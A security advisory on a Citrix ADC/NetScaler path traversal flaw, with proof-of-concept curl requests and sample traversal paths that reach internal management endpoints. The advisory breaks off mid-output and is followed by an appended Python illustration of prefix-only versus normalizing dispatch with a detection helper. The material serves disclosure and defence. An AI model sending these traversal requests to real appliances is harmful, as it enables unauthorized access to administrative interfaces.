-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2020-020
Product: ADC/NetScaler
Manufacturer: Citrix
Tested Version(s): NS13.0 52.24
Vulnerability Type: Relative Path Traversal (CWE-23)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2020-05-06
Public Disclosure: 2020-10-02
CVE Reference: None assigned
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

NetScaler/Citrix ADC is a multi-protocol reverse proxy appliance, commonly
used to externally provide Citrix Remote Desktop Services or SSL VPN.

The manufacturer describes the product as follows (see [1]):

"Citrix ADC is the most comprehensive application delivery and load
balancing solution for monolithic and microservices-based applications.
Which means you can deliver a better user experience, on any
device—anywhere."

Due to missing path normalization/validation, Citrix ADC is vulnerable to
path traversal attacks, which allows access to internal management
resources from the external appliance interface (virtual IP).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Even though this has been one of the primary parts of the recent critical
Citrix ADC vulnerability [2], the patch provided by the vendor merely
prevents this specific vector (and addresses some of the vulnerabilities
of the targeted script).

In general, request dispatching from the front-end reverse proxy service
to the back end, specifically the local web server providing the user
front-end and management web interfaces, is purely based on prefix
matching and does not implement proper mitigations against path traversal
attacks.

Authenticated users can, for example, access the following resources on
the management server through the external interface (virtual IP):

- - https://$NETSCALER/vpn/../admin_ui/php/index.php
- - https://$NETSCALER/vpn/../nitro/v1/{...}

Moreover, a SOAP web service handler (Apache mod_gsoap) can be reached at
https://$NETSCALER/vpn/../soap. However, this handler appears to be
defunct in the tested version.

While none of these services appear to be directly usable/exploitable,
they still expose a significant additional attack surface.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

While both

> curl -k -v --path-as-is https://$NETSCALER/vpn/../admin_ui/php/index.php \
    -H "Cookie: NSC_AAAC={...}"

and

> curl -k -v --path-as-is https://$NETSCALER/vpn/../nitro/v1/config \
    -H "Cookie: NSC_AAAC={...}"

result in an HTTP 404 error,

< HTTP/1.1 404 Not Found
< Date: Tue, 05 May 2020 13:01:52 GMT
< Server: Apache
< X-Frame-Options: SAMEORIGIN
< X-XSS-Protection: 1; mode=block

further investigation shows that these requests are actually reaching the
PHP interpreter and application code at:

- - /netscaler/ns_gui/admin_ui/php/index.php
- - /netscaler/ns_gui/admin_ui/nitro/nitro.php

The 404 error is merely caused by each script's internal routing not
recognizing the request path.

> curl -k --path-as-is https://$NETSCALER/vpn/../ -H "Cookie: NSC_AAAC={...}"
- -> [...]
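The root cause described above is a dispatcher that matches the raw request path against an allowed prefix and forwards it unchanged, so the back-end web server resolves the embedded ".." and serves a resource outside the matched prefix. The following Python is an added illustration, not code from the advisory or from Citrix: it contrasts such a prefix-only dispatcher with a normalize-then-match variant and adds a small helper a defender can run over request paths from access logs. The route table (PUBLIC_PREFIXES) and all request paths are constructed for the example.

```python
"""Added example: raw-prefix dispatch vs. normalize-then-match dispatch.

Not Citrix ADC code; the route table and request paths below are
constructed to illustrate the behaviour the advisory describes.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed allow-list of URL prefixes the external (VIP) interface is
# supposed to forward to the back-end web server.
PUBLIC_PREFIXES = ("/vpn/", "/logon/", "/cgi/")


def vulnerable_dispatch(raw_path: str) -> Optional[str]:
    """Prefix match on the raw path and forward it verbatim.

    This is the weak pattern: '/vpn/../admin_ui/...' starts with '/vpn/',
    so it is forwarded and the back end resolves the '..' itself.
    Returns the forwarded path, or None when no prefix matches.
    """
    for prefix in PUBLIC_PREFIXES:
        if raw_path.startswith(prefix):
            return raw_path
    return None


def normalize(raw_path: str) -> str:
    """Percent-decode once, then collapse '.', '..' and repeated slashes.

    posixpath.normpath never climbs above '/', so '/vpn/../..' becomes '/'.
    It does keep a leading '//' (allowed by POSIX); collapse that as well so
    the prefix comparison below sees a single canonical form.
    """
    norm = posixpath.normpath(unquote(raw_path))
    if norm.startswith("//"):
        norm = "/" + norm.lstrip("/")
    return norm


def hardened_dispatch(raw_path: str) -> Optional[str]:
    """Normalize first, match the normalized path, forward the normalized path.

    Forwarding the normalized form (not the raw one) means the back end
    receives exactly the path that was authorised, whatever encoding or
    dot-segment trick the raw request used.
    """
    if not raw_path.startswith("/"):
        return None
    decoded = unquote(raw_path)
    # Backslashes and NUL bytes have no legitimate place in a URL path here
    # and are a common way to confuse a later normalization step.
    if "\\" in decoded or "\x00" in decoded:
        return None
    norm = normalize(raw_path)
    for prefix in PUBLIC_PREFIXES:
        # normpath strips a trailing slash, so '/vpn/' normalizes to '/vpn'.
        if norm == prefix.rstrip("/") or norm.startswith(prefix):
            return norm
    return None


def is_traversal_attempt(raw_path: str) -> bool:
    """True when the raw path would pass the prefix check but its
    normalized form does not, i.e. the request escapes the matched prefix.
    Useful as a detection rule over request paths taken from access logs."""
    return vulnerable_dispatch(raw_path) is not None and \
        hardened_dispatch(raw_path) is None


if __name__ == "__main__":
    # Constructed sample request paths, including the shape from the advisory.
    for path in ("/vpn/index.html",
                 "/vpn/../admin_ui/php/index.php",
                 "/vpn/%2e%2e/nitro/v1/config",
                 "/vpn/..",
                 "/vpn//sub/../x"):
        print(f"{path:40} raw->{vulnerable_dispatch(path)!s:35} "
              f"hardened->{hardened_dispatch(path)!s:15} "
              f"traversal={is_traversal_attempt(path)}")
```

The second and third sample paths are forwarded by the raw-prefix dispatcher but rejected by the hardened one, which is exactly the distinction the advisory draws: the vendor's fix blocks one literal vector, whereas normalizing before the prefix decision rejects the whole class, including the percent-encoded form.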